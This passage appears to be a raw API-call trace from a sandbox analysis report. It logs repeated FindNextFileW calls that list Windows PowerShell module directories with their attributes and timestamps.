lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0140.078] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0140.078] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0140.078] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0140.079] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0140.079] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0140.079] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0140.079] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0140.080] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0140.080] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0140.080] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0140.080] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0140.080] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0140.081] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0140.081] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0140.081] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0140.081] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0140.082] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0140.082] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0140.082] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0140.082] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0140.082] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0140.083] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0140.083] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0140.083] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0140.083] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0140.084] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0140.084] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0140.084] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0140.084] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0140.085] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0140.085] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0140.085] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0140.085] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0140.085] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0140.086] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0140.086] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0140.086] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0140.086] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0140.087] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0140.087] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0140.087] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0140.087] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0140.088] FindNextFileW (in: hFindFile=0x1e3371a20c0, 